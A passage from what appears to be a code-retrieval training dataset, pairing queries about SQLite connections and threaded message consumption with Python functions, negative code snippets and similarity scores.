uploadRepoFiles()\n if local:\n for key in self.nbDetails:\n # Skip metadata key if present\n if key!='proc' and self.nbDetails[key]['pkg'] and self.nbDetails[key]['archFilesOK']:\n self.uploadRepoFiles(key)\n\n else:\n # Upload on remote machine.\n ACCESS_TOKEN = initZenodo(self.hostDefn['localhost']['localSettings']/'zenodoSettings.dat')\n with self.c.prefix(f\"source {self.hostDefn[self.host]['condaPath']} {self.hostDefn[self.host]['condaEnv']}\"):\n result = self.c.run(f\"{Path(self.hostDefn[self.host]['repoScpPath'], self.scpDefnRepo['uploadNohup']).as_posix()} \\\n {Path(self.hostDefn[self.host]['repoScpPath'], self.scpDefnRepo['upload']).as_posix()} \\\n {self.hostDefn[self.host]['nbProcDir']/self.jsonProcFile.name} {ACCESS_TOKEN}\",\n warn = True, timeout = 10)\n\n print(f\"Log file set: {self.hostDefn[self.host]['nbProcDir']/self.jsonProcFile.name}\")\n # Remote upload set to run via nohup... will need to pull logs later.\n\n # Publish\n\n # return 'Not implemented'", "def download():\n raise NotImplementedError", "def main(url, localfile):\n ph.download_file(url, localfile)", "def do_pack():\n a = datetime.now()\n file_name = \"versions/web_static_{}{}{}{}{}{}.tgz\".format(a.year,\n a.month,\n a.day,\n a.hour,\n a.minute,\n a.second)\n try:\n print(\"Packing web_static to \" + file_name)\n local(\"mkdir -p versions\")\n\n local(\"tar -cvzf \" + file_name + \" web_static\")\n return file_name\n except:\n return None", "def PublishIt(name, path, comments, task=os.getenv('TASK'), status=\"WORK IN PROGRESS\"):\n\n db = get_connection()\n\n PubCollections = db['submissions']\n\n # creation of the dailies submission entry\n publishDict = dict()\n publishDict['date'] = now\n publishDict['type'] = \"publish\"\n publishDict['user_name'] = main_user\n publishDict['task'] = task\n publishDict['status'] = status\n publishDict['asset'] = name\n publishDict['path'] = path\n publishDict['comment'] = comments\n PubCollections.save(publishDict)\n notifications.push_notifications({\"name\": main_user, \"email\": os.getenv('USER_EMAIL')}, users_list, \"publish\", shot, now)", "def publish_daemon(\n self,\n publish_payload,\n presence_callback=None,\n remove_presence_callback=None,\n ):\n io_loop = tornado.ioloop.IOLoop()\n\n # Spin up the publisher\n self.pub_server = pub_server = PubServer(\n self.opts,\n io_loop=io_loop,\n presence_callback=presence_callback,\n remove_presence_callback=remove_presence_callback,\n )\n sock = _get_socket(self.opts)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n _set_tcp_keepalive(sock, self.opts)\n sock.setblocking(0)\n sock.bind(_get_bind_addr(self.opts, \"publish_port\"))\n sock.listen(self.backlog)\n # pub_server will take ownership of the socket\n pub_server.add_socket(sock)\n\n # Set up Salt IPC server\n if self.opts.get(\"ipc_mode\", \"\") == \"tcp\":\n pull_uri = int(self.opts.get(\"tcp_master_publish_pull\", 4514))\n else:\n pull_uri = os.path.join(self.opts[\"sock_dir\"], \"publish_pull.ipc\")\n self.pub_server = pub_server\n pull_sock = salt.transport.ipc.IPCMessageServer(\n pull_uri,\n io_loop=io_loop,\n payload_handler=publish_payload,\n )\n\n # Securely create socket\n log.warning(\"Starting the Salt Puller on %s\", pull_uri)\n with salt.utils.files.set_umask(0o177):\n pull_sock.start()\n\n # run forever\n try:\n io_loop.start()\n except (KeyboardInterrupt, SystemExit):\n pass\n finally:\n pull_sock.close()", "def collect_data(url: str, channel: str, file_name: str):\n print(f\"Downloadng data : {channel}\")\n download(url)\n upload_to_s3(channel, file_name)\n print(f\"Finished downloadng data : {channel}\")", "def download(self):\n logger.info(f\"downloading project {self}\")\n self.project.storage.download(f\"{self.path}/releasemanifest\", None)\n self.extract()", "def copy(self, source_host, dest_host, filename):", "def do_pack():\n a = datetime.now()\n file_name = \"versions/web_static_{}{}{}{}{}{}.tgz\\\n\".format(a.year if a.year > 999 else \"0\" + str(a.year),\n a.month if a.month > 9 else \"0\" + str(a.month),\n a.day if a.day > 9 else \"0\" + str(a.day),\n a.hour if a.hour > 9 else \"0\" + str(a.hour),\n a.minute if a.minute > 9 else \"0\" + str(a.minute),\n a.second if a.second > 9 else \"0\" + str(a.second))\n try:\n print(\"Packing web_static to \" + file_name)\n local(\"mkdir -p versions\")\n\n local(\"tar -cvzf \" + file_name + \" web_static\")\n return file_name\n except:\n return None", "def do_pack():\n\n now = datetime.now()\n # format the name of the file with the timestamps\n now_year = now.year\n now_month = now.month\n now_day = now.day\n now_hour = now.hour\n now_minute = now.minute\n now_second = now.second\n # apply the format\n file_name = 'versions/web_static_{}{}{}{}{}{}.tgz'.format(\n now_year, now_month, now_day, now_hour, now_minute, now_second\n )\n # All archives must be stored in the folder versions\n local('mkdir -p versions')\n # execute locally the compression of the folder\n command = local(\"tar -cvzf \" + file_name + \" ./web_static/\")\n # return the archive path if the archive has been correctly generated\n if command.succeeded:\n return file_name\n else:\n return None" ]
[ "0.74543023", "0.6922994", "0.6866991", "0.676951", "0.642343", "0.6293285", "0.6157238", "0.6132221", "0.60680485", "0.59941494", "0.5980355", "0.5970285", "0.59354484", "0.5896326", "0.58699507", "0.5835118", "0.5805512", "0.58000696", "0.57821625", "0.5779796", "0.57461995", "0.56931955", "0.5661582", "0.5660802", "0.5656355", "0.5643859", "0.56142336", "0.5604374", "0.55907357", "0.5585925", "0.5553939", "0.55416304", "0.55128866", "0.55002385", "0.5483548", "0.54807156", "0.54797167", "0.5475378", "0.5472647", "0.54373586", "0.5413688", "0.54042435", "0.53996503", "0.53838676", "0.5363016", "0.5362128", "0.5344835", "0.5342024", "0.5332223", "0.5324793", "0.53223383", "0.5318282", "0.5317942", "0.53122413", "0.53120613", "0.52977407", "0.52829254", "0.528166", "0.5278889", "0.52727056", "0.52705425", "0.52579045", "0.52566344", "0.52493525", "0.52489704", "0.5245051", "0.5243567", "0.52425915", "0.5239626", "0.5236684", "0.5234338", "0.52337354", "0.5219301", "0.5208864", "0.5205019", "0.5191308", "0.51863754", "0.517976", "0.5178498", "0.51764464", "0.5175472", "0.5168397", "0.51631457", "0.51606697", "0.5152671", "0.515064", "0.51381195", "0.51331866", "0.51222914", "0.51176924", "0.5115513", "0.5114387", "0.5104905", "0.509628", "0.50950134", "0.50944114", "0.50884205", "0.5082443", "0.5073846", "0.50699496" ]
0.77630585
0
create a database connection to a SQLite database
def create_connection(db_file): conn = None try: conn = sqlite3.connect(db_file) return conn except Error as e: print(e) return conn
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def connect_db(self) -> sqlite3.Connection:", "def create_connection():\n dir_path = os.path.dirname(os.path.abspath(__file__))\n db_file = dir_path + '/py_sqlite.db'\n try:\n DbUtil.connection = sqlite3.connect(db_file)\n except Error as e:\n print(e)\n finally:\n print('connection success')", "def create_conn():\n return sqlite3.connect(DBFILE)", "def create_connection(sqlite_db_file):\n try:\n connection_db = sqlite3.connect(sqlite_db_file)\n return connection_db\n except Exception:\n pass", "def connect_db():\n rv = sqlite3.connect('sqlite.db')\n rv.row_factory = sqlite3.Row\n return rv", "def create_connection():\n db_file = \"data/data.db\"\n conn = None\n \n try:\n conn = sqlite3.connect(db_file)\n return conn\n except Exception as e:\n pass", "def create_connection(db_file):\n conn = sqlite3.connect(db_file)\n return conn", "def create_sqlite_connection(db_filename=SQLITE_DATABASE_FILE):\n return sqlite3.connect(db_filename)", "def create_connection(db_file):\n\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n conn.row_factory = sqlite3.Row\n except Error as e:\n print(e)\n return conn", "def create_connection(self):\r\n\r\n try:\r\n self.conn = sqlite3.connect(self.database_name)\r\n\r\n except sqlite3.Error:\r\n print('Error connecting to database')", "def create_connection(db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n print(sqlite3.version)\n except Error as e:\n print(e)\n finally:\n if conn:\n conn.close()", "def create_connection(db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n print(sqlite3.version)\n except Error as e:\n print(e)\n finally:\n if conn:\n conn.close()", "def create_connection(db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n print(sqlite3.version)\n except Error as e:\n print(e)\n finally:\n if conn:\n conn.close()", "def sql_connection():\n return sqlite3.connect('database.db')", "def create_connection():\r\n\r\n try:\r\n dburi = 'file:{}?mode=rw'.format(pathname2url(db_name))\r\n conn = sqlite3.connect(dburi, uri=True)\r\n print(\"connected successfuly.\")\r\n return conn\r\n except sqlite3.OperationalError as err:\r\n print(\"connection failed.\")\r\n print(\"make sure that you have typed the correct database name.\")", "def create_connection(db_file):\r\n conn = None\r\n try:\r\n conn = sqlite3.connect(db_file)\r\n print(sqlite3.version)\r\n except Error as e:\r\n print(e)\r\n return conn", "def create_connection(db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n print(sqlite3.version)\n except Error as e:\n print(e)\n return conn", "def create_db_connection(db_file):\n\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n except Exception as e:\n print(e)\n\n return conn", "def create_connection(db_file):\r\n conn = None\r\n try:\r\n conn = sqlite3.connect(db_file)\r\n print(sqlite3.version)\r\n except Error as e:\r\n print(e)\r\n\r\n return conn", "def create_connection(db_file):\n try:\n conn = sqlite3.connect(db_file)\n print(sqlite3.version)\n except Error as e:\n print(e)\n finally:\n conn.close()", "def create_connection(db_file):\r\n conn = None\r\n try:\r\n conn = sqlite3.connect(db_file)\r\n print(sqlite3.version) \r\n except Error as e:\r\n print(e)\r\n return conn", "def connect_db():\n return sqlite3.connect(DATABASE)", "def connect_db():\n return sqlite3.connect(DATABASE)", "def connect_db():\n return sqlite3.connect(DATABASE)", "def create_connection(db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n print(sqlite3.version)\n return conn\n except Error as e:\n print(e)", "def create_connection(db_file):\r\n conn = None\r\n try:\r\n conn = sqlite3.connect(db_file)\r\n except Error as e:\r\n print(e)\r\n \r\n return conn", "def create_connection(db_file):\n try:\n con = sqlite3.connect(db_file)\n print('SQLite Version is: ', sqlite3.version)\n except sqlErr as se:\n raise Exception('SQL Error in create_connection(): ' + se.__str__())\n except Exception as e:\n raise Exception('General Error in create_connection(): ' + e.__str__())\n return con", "def create_connection(db_file):\n try:\n con = sqlite3.connect(db_file)\n print('SQLite Version is: ', sqlite3.version)\n except sqlErr as se:\n raise Exception('SQL Error in create_connection(): ' + se.__str__())\n except Exception as e:\n raise Exception('General Error in create_connection(): ' + e.__str__())\n return con", "def database():\n return sqlite3.connect(DATABASE)", "def __create_connection():\n connection = None\n try:\n connection = sqlite3.connect(Database.filepath)\n return connection\n except Error as e:\n print(e)\n\n return connection", "def create_connection(db):\n try:\n conn = sqlite3.connect(db)\n return conn\n except Error as err:\n print(err)\n return None", "def create_connection(db):\n try:\n conn = sqlite3.connect(db)\n return conn\n except Error as err:\n print(err)\n return None", "def create_connection(db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n return conn\n except Exception as e:\n print(e)\n\n return conn", "def bd_conecta():\n if not hasattr(g, 'sqlite_db'):\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n g.sqlite_db = rv\n return g.sqlite_db", "def create_connection(db_file):\n\tconn = None\n\ttry:\n\t\tconn = sqlite3.connect(db_file)\n\t\treturn conn\n\texcept Error as e:\n\t\tprint(e)\n \n\treturn conn", "def create_connection(db_file):\n conn = None\n try:\n conn = sqlite3.connect('project1.db')\n return conn\n except Error as e:\n print(e)\n \n return conn", "def create_connection(db_file):\r\n conn = None\r\n try:\r\n conn = sqlite3.connect(db_file)\r\n return conn\r\n except Error as e:\r\n print(e)\r\n return conn", "def create_connection(db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n except sqlite3.Error as e:\n print('coucou')\n print(e)\n return conn", "def create_connection(self):\n try:\n conn = sqlite3.connect(self.db_path)\n return conn\n except Error as e:\n print(e)\n raise e", "def connect_db():\n return sqlite3.connect(config.db)", "def create_connection(self, db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n return conn\n except Error as e:\n print(e)\n return conn", "def create_connection(db):\n try:\n conn = sqlite3.connect(db)\n return conn\n except Error as e:\n print(e)\n return None", "def create_connection(db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n except Error as e:\n print(e)\n \n return conn", "def create_connection(db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n except Error as e:\n print(e)\n \n return conn", "def create_connection(db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n return conn\n except Error as e:\n print(e)\n return conn", "def db_connect():\n\n connect_string = \"sqlite:///database.sqlite\"\n\n return create_engine(connect_string)", "def create_connection(db_file):\n\tconn = None\n\ttry:\n\t\tconn = sqlite3.connect(db_file)\n\texcept Error as e:\n\t\tprint(e)\n\treturn conn", "def create_connection(db_file):\r\n conn = None\r\n try:\r\n conn = sqlite3.connect(db_file)\r\n except Error as e:\r\n print(e)\r\n\r\n return conn", "def connect_db():\n db = sqlite3.connect(app.config['DATABASE'])\n\n def make_dicts(cursor, row):\n return dict((cursor.description[idx][0], value) for idx, value in enumerate(row))\n\n db.row_factory = make_dicts\n return db", "def create_connection(db_file):\n\ttry:\n\t\tconn = sqlite3.connect(db_file)\n\texcept Error as e:\n\t\tprint(e)\n\t\n\treturn conn", "def connect() -> sqlite3.Connection:\n if not os.path.isfile(DATABASE):\n connection = init()\n else:\n connection = sqlite3.connect(DATABASE, check_same_thread=False)\n return connection", "def create_connection(db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n print(sqlite3.version)\n except Error as e:\n print(e)\n return None\n finally:\n return conn", "def create_connection(db_file):\n try:\n conn = sqlite3.connect(db_file)\n conn.row_factory = sqlite3.Row\n return conn\n except Error as e:\n print(e)\n\n return None", "def create_connection(db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n except Error as e:\n print(e)\n\n return conn", "def create_connection(db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n except Error as e:\n print(e)\n\n return conn", "def create_connection(db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n except Error as e:\n print(e)\n\n return conn", "def create_connection(db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n except Error as e:\n print(e)\n\n return conn", "def create_connection(db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n except Error as e:\n print(e)\n\n return conn", "def create_connection(db_file):\n\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n return conn\n except sqlite3.Error as e:\n print(e)\n\n return conn", "def connect_db():\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n return rv", "def connect_db():\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n return rv", "def connect_db():\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n return rv", "def connect_db():\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n return rv", "def connect_db():\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n return rv", "def connect_db():\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n return rv", "def connect_db():\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n return rv", "def connect_db():\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n return rv", "def connect_db():\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n return rv", "def connect_db():\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n return rv", "def connect_db():\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n return rv", "def connect_db():\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n return rv", "def connect_db():\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n return rv", "def connect_db():\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n return rv", "def connect_db():\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n return rv", "def connect_db():\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n return rv", "def connect_db():\r\n rv = sqlite3.connect(app.config['DATABASE'])\r\n rv.row_factory = sqlite3.Row\r\n return rv", "def create_connection(self, db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n return conn\n except Error as e:\n print(e)\n\n return conn", "def connect_db():\n rv = sqlite3.connect(app.config[\"DATABASE\"])\n rv.row_factory = sqlite3.Row\n return rv", "def create_connection(db_file):\n\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n print(\"Connection sucessfull. SQLite3 version \"+sqlite3.version)\n return conn\n except Error as e:\n print(e)\n\n return conn", "def create_connection(self,db_file):\n print(\"yes\")\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n except Error as e:\n print(e)\n\n return conn", "def create_connection():\n\ttry:\n\t\tconn = sqlite3.connect(db_path)\n\t\treturn conn\n\texcept Error as e:\n\t\tprint(e)\n\n\treturn None", "def create_db_connection(db_path):\n\n try:\n con = sqlite3.connect(db_path)\n\n except sqlite3.Error as e:\n print(e)\n return False\n\n return con", "def connect_db():\n debug(\"Connecting to DB.\")\n conn = sqlite3.connect(os.path.join(app.root_path, 'banweb.db'))\n conn.row_factory = sqlite3.Row\n return conn", "def connect_db():\n\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n return rv", "def get_sqlite():\n return sqlite3.connect('igraph.db')", "def connect_db():\n logging.info('Connects to the specific database.')\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n g.db = rv\n logging.info(rv)\n return rv", "def _CreateConnection(db_file):\r\n conn = None\r\n try:\r\n conn = sqlite3.connect(db_file)\r\n except Error as e:\r\n print(e)\r\n\r\n return conn", "def db_connect():\n def dict_factory(cursor, row):\n d = {}\n for idx, col in enumerate(cursor.description):\n d[col[0]] = row[idx]\n return d\n\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = dict_factory\n\n return rv", "def connect():\n global db_name\n con = sqlite3.connect(db_name)\n return con", "def create_database(databasefile):\r\n conn = None\r\n try:\r\n conn = sqlite3.connect(databasefile, check_same_thread=False)\r\n except Error as e:\r\n print(e)\r\n\r\n return conn", "def connect_db(self) -> sqlite3.Connection:\n self.connection = sqlite3.connect(self.database)\n self.connection.row_factory = sqlite3.Row\n\n self.get_cursor()", "def connect_db():\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n \n return rv", "def create_connection(db_file):\n conn = None\n\n try:\n # create database file or connect to existing\n conn = sqlite3.connect(db_file)\n return conn\n except Error as e:\n print(e)\n\n return conn", "def create_connection():\n conn = None\n try:\n db_file = './database/courses.sql'\n conn = sqlite3.connect(db_file)\n return conn\n except Error as e:\n print(e)\n return conn", "def dbconn():\n SQLITE_DB_FILE = '/tmp/test_fyle.db'\n if os.path.exists(SQLITE_DB_FILE):\n os.remove(SQLITE_DB_FILE)\n return sqlite3.connect(SQLITE_DB_FILE, detect_types=sqlite3.PARSE_DECLTYPES | sqlite3.PARSE_COLNAMES)", "def create_connection(self, db_file):\r\n conn = None\r\n try:\r\n conn = sqlite3.connect(db_file)\r\n except Error as e:\r\n print(e)\r\n\r\n return conn", "def create_connection(db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n print(\"connected\")\n except Error as e:\n print(e)\n \n return conn", "def create_connection(db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n print(\"connected\")\n except Error as e:\n print(e)\n \n return conn", "def create_connection(db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n except ValueError as e:\n raise e\n\n return conn", "def create_connection(db_file):\n try:\n conn = sqlite3.connect(db_file)\n return conn\n except Exception as e:\n print(e)\n return None" ]
[ "0.8269675", "0.8154287", "0.8153167", "0.80855244", "0.8006094", "0.79054296", "0.7893724", "0.78821623", "0.7875023", "0.7869494", "0.7866777", "0.7866777", "0.7866777", "0.7866019", "0.78544617", "0.7850683", "0.78433925", "0.7838268", "0.78342485", "0.78307635", "0.7823101", "0.7819416", "0.7819416", "0.7819416", "0.7816135", "0.7814955", "0.7811713", "0.7811713", "0.77994037", "0.7792554", "0.77883893", "0.77883893", "0.77883255", "0.77812296", "0.77754956", "0.77638996", "0.7754212", "0.7753095", "0.7748186", "0.7747585", "0.77473444", "0.77465373", "0.774455", "0.774455", "0.7742595", "0.7739998", "0.77368873", "0.7734926", "0.77340084", "0.77327657", "0.7732009", "0.7730109", "0.7725966", "0.77212334", "0.77212334", "0.77212334", "0.77212334", "0.77212334", "0.7704349", "0.7701208", "0.7701208", "0.7701208", "0.7701208", "0.7701208", "0.7701208", "0.7701208", "0.7701208", "0.7701208", "0.7701208", "0.7701208", "0.7701208", "0.7701208", "0.7701208", "0.7701208", "0.7701208", "0.77008015", "0.770007", "0.7688527", "0.76761997", "0.7674924", "0.7673494", "0.7672459", "0.76717615", "0.76684207", "0.7661512", "0.76601136", "0.76555705", "0.7643266", "0.76423395", "0.764077", "0.7638095", "0.7635131", "0.76309025", "0.762915", "0.7628067", "0.7623846", "0.7619813", "0.7619813", "0.7617029", "0.7615162" ]
0.77235234
53
Start a thread and consume messages there.
def async_consume(self, callback, auto_ack=False): logging.info("Async consume") if self.thread is not None: return self.thread_stop = False def wrapped_callback(ch, method, properties, body): #logging.info("Wrapped callback'd") callback(ch, method, properties, body) #if not self.thread_stop: # callback(ch, method, properties, body) #else: # print("Should stop now!") # callback(ch, method, properties, body) # self.channel.basic_cancel(self.tag) # exit self.thread = threading.Thread(target=self.consume, args=(wrapped_callback,), kwargs={"auto_ack":auto_ack}) self.thread.start()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def start_thread(self):\n self.thread = Thread(target=self.put_lines_into_queue)\n self.thread.daemon = True\n self.thread.start()", "def start(self):\n\n def pubsub_thread():\n \"\"\" Call get_message in loop to fire _handler. \"\"\"\n\n while not self._stop.is_set():\n self._pubsub.get_message()\n sleep(0.01)\n\n # subscribe to personal channel and fire up the message handler\n self._pubsub.subscribe(**{'actor:%s' % self.uuid: self._handler})\n self._proc = Thread(target=pubsub_thread)\n self._proc.daemon = True\n self._proc.start()", "def do_start(self):\n threading.Thread(group = None, \n target = self._subscribe_message, name = \"RabbitMQSubscribeThread\") .start()\n threading.Thread(group = None, \n target = self._publish_message, name = \"RabbitMQPublishThread\").start()", "def run(self):\n self.thread_send.start()\n self.thread_receive.start()", "def start(self):\n if self._chan is not None:\n try:\n self._chan.start_consume()\n except ChannelError:\n log.info('Subscriber is already started')\n\n else:\n self.gl = spawn(self.listen)", "def start_background_thread(self):\n self.runner = Runner(queue=queue, app_id=self.app_id)\n self.runner.start()\n # TODO: stop the thread at some point?", "async def start(self):\n\n while True:\n try:\n data = await self.reader.read(8192)\n\n if self._trace_enabled:\n self._logger.trace(\n \"Received %d bytes from remote server:\\n%s\",\n len(data),\n msg.dump(data),\n )\n await self.process(data)\n except asyncio.CancelledError:\n return\n except:\n logging.exception(\"Unhandled error in Message Reader\")\n raise", "def start(self):\n self._setup_thread()\n self.thread.start()", "def start(self):\n self.thread.start()", "def run(self):\n t = Thread(target=self._listen)\n t.start()", "def start(self):\n self._thread.start()", "def start_thread(self):\n self.stop_thread()\n self.running = True\n self.run_thread = threading.Thread(target=self.run, daemon=True)\n self.run_thread.start()", "def start(self):\n self.has_event = False\n self.running = True\n self._condition.acquire()\n self._thread = threading.Thread(target=read_input, args=(self,))\n self._thread.start()", "def _start_in_thread(self):\n return spawn_waitready(self._listen, self.start)[0]", "def run(self):\n receiver = threading.Thread(target=self.receive_data)\n # Setting daemon to True means that this Thread will be terminated when the main program ends.\n receiver.daemon = True\n receiver.start()", "def start(self):\n\n if self.thread is None:\n self.thread = threading.Thread(\n target=self.__run__,\n daemon=True,\n )\n\n self.thread.start()\n LOGGER.debug(\n \"Starting thread `%s` for event loop `%s`.\",\n self.ident,\n self.thread.ident,\n )", "def start_consuming(self, channel, rx_queue_name):\n if self.should_stop():\n logger.info(\"ready to stop, pause to consume\")\n return\n logger.info('Issuing consumer related RPC commands')\n self._consumer_tag = channel.basic_consume(\n self.on_message, rx_queue_name, auto_ack = False)\n channel.start_consuming()", "def start_read_thread(self):\r\n\r\n if self._connected:\r\n self._reading = True\r\n self._serial_thread = Thread(target=self._read_thread, daemon=True)\r\n self._serial_thread.start()", "def start_new_thread(self, conn, addr):\n thread = ClientThread(conn, addr, self.msg_queue)\n thread.start()\n return thread", "def start(self):\n\n\t\twhile True:\n\t\t\tinputReady, outputReady, exceptReady = select.select(\n\t\t\t\t[self.s],\n\t\t\t\t[],\n\t\t\t\t[],\n\t\t\t\t3\n\t\t\t)\n\n\t\t\t# Ready for receiving\n\t\t\tif len(inputReady) > 0 and inputReady[0] == self.s:\n\t\t\t\t# Read lines until input buffer is empty\n\t\t\t\tfor line in self.receiveLines():\n\t\t\t\t\tif len(line) > 0:\n\t\t\t\t\t\tprint(line)\n\n\t\t\t\t\tself.handle(line)\n\n\t\t\t# Only send if there is something to send\n\t\t\tif not self.outQueue.empty():\n\t\t\t\tm = self.outQueue.get_nowait()\n\n\t\t\t\tprint(\"Sending '{}'\".format(m.rstrip(\"\\r\\n\")))\n\t\t\t\tself.s.send(bytes(m, \"utf-8\"))\n\t\t\t\tself.outQueue.task_done()", "def start(self):\n \n self.keep_running = True\n self.th = threading.Thread(target=self.sendData)\n self.th.daemon = True # Thread will terminate with the main\n self.th.start()\n self.th.join(0)", "def start_speaking(self):\n self.allowed_to_chat = True\n self.chat_message_queue.clear()\n self.chat_thread = threading.Thread(target=self._process_chat_queue,\n kwargs={'chat_queue': self.chat_message_queue})\n self.chat_thread.daemon = True\n self.chat_thread.start()", "def start(self):\r\n monitor_thread = Thread(target = self.monitor)\r\n monitor_thread.setDaemon(True)\r\n monitor_thread.start()\r\n\r\n main_thread = Thread(target = self.run)\r\n main_thread.setDaemon(True)\r\n main_thread.start()", "def listen(self):\n self.processor_thread = Thread(target = self.event_loop, name=\"InputThread-\"+str(self.thread_index), args=(self.thread_index, ))\n self.thread_index += 1\n self.processor_thread.daemon = True\n self.processor_thread.start()", "def start_reader(self):\n # if already started, return immediately\n if self.running:\n return\n\n # construct a new reader & start it\n self.reader = threading.Thread(target = self.read_data)\n self.reader.start()", "def start(self) -> None:\n self.stopping.clear()\n self.thread = threading.Thread(target=self._run, daemon=True, name=self.thread_name)\n self.thread.start()", "def start(self):\n gv.logger.info(\"Started playing new playlist\")\n thread = Thread(target=self.run, args=())\n thread.daemon = True\n self.thread = thread\n thread.start()", "def start(self):\n waiting_for_clients = Thread(target=self.accept_client)\n waiting_for_clients.start()", "def listen(self):\n self.channel.start_consuming()", "def start(self):\n \n self.thread.start()\n self.state = \"running\"", "def start(self):\r\n start_thread(self._extract_thread_func, \"message sorter thread\")\r\n self.debug(\"### initialized stream sorter with %g s time window\"\r\n % (self.delay))", "def start(self) -> None:\n start_thread(super().start, self.__class__.__name__)", "def run(self):\n self.channel.queue_declare(self._request_queue)\n self.channel.basic_consume(self._request_queue, self.on_message)\n try:\n msg = \"Waiting for message ...\"\n print(msg)\n logging.info(msg)\n self.channel.start_consuming()\n except KeyboardInterrupt:\n self.channel.stop_consuming()\n\n self.connection.close()", "def start_pull_thread(self):\r\n threading.Thread(target=self._pull_thread).start()", "def start_consuming(self):\n logger.info('Issuing consumer related RPC commands')\n self.add_on_cancel_callback()\n logger.info(\"[{}] Waiting for messages on exchange {}\".format(self.bot_id, self.exchange))\n self._consumer_tag = self._channel.basic_consume(self.on_message,\n self.queue_name)", "def run(self) -> None:\n while self.data_incoming or len(self._queue):\n if not self._queue:\n logging.info(\"Consumer %d is sleeping since queue is empty\", self._name)\n time.sleep(0.75)\n print(self._queue.get())\n time.sleep(0.5)", "def startReading(self):\n self.reading = True\n self.thread = ReadSocket(self)\n self.thread.start()", "def start_consuming(self):\n # LOGGER.info('Issuing consumer related RPC commands')\n if self._init_ok_ctrl and self._init_ok_task:\n self._channel_ctrl.add_on_cancel_callback(self.on_consumer_ctrl_cancelled)\n self._channel_task.add_on_cancel_callback(self.on_consumer_task_cancelled)\n self._consumer_tag_task = self._channel_task.basic_consume(\n self.queue_task,\n auto_ack=False,\n on_message_callback=self.on_message\n )\n self._consumer_tag_ctrl = self._channel_ctrl.basic_consume(\n self._topic_queue_name,\n auto_ack=False,\n on_message_callback=self.on_topic\n )\n self.was_consuming = True\n self._consuming = True", "def pubsub_thread():\n\n while not self._stop.is_set():\n self._pubsub.get_message()\n sleep(0.01)", "def run(self):\n log.info(\"Starting thread\")\n if self.open_listener():\n\n # This feels so dirty, but we need to make sure the thread isn't always blocking so we\n # can safely shutdown the thread. Given that the Listener address is always an IP\n # it should be safe. Should be, famous last words of course...\n conn = self.listener._listener._socket\n\n while self.running:\n r_list, w_list, e_list = select.select([conn, ], [conn, ], [conn, ], 0.01)\n\n if conn in r_list:\n connection = None\n try:\n connection = self.listener.accept()\n log.info(\"Connection opened by %s\", self.listener.last_accepted)\n\n while self.running:\n if connection.poll():\n msg = connection.recv()\n globals.strip_data.spi_recv(msg)\n except (IOError, EOFError):\n if connection:\n connection.close()\n log.info(\"Connection closed %s\", self.listener.last_accepted)\n\n log.info(\"Exiting thread\")", "def start_thread(self) -> threading.Thread:\n assert self._thread is None, \"Thread has already been created.\"\n\n self._thread = threading.Thread(target=self.start)\n self._thread.start()\n return self._thread", "def start(self):\n\n self.__thread = Thread(target=self.run, name=self.name)\n self.__thread.daemon = True\n self.__thread.start()\n\n return self.__thread, None", "def start(self):\n listening_thread = Thread(\n 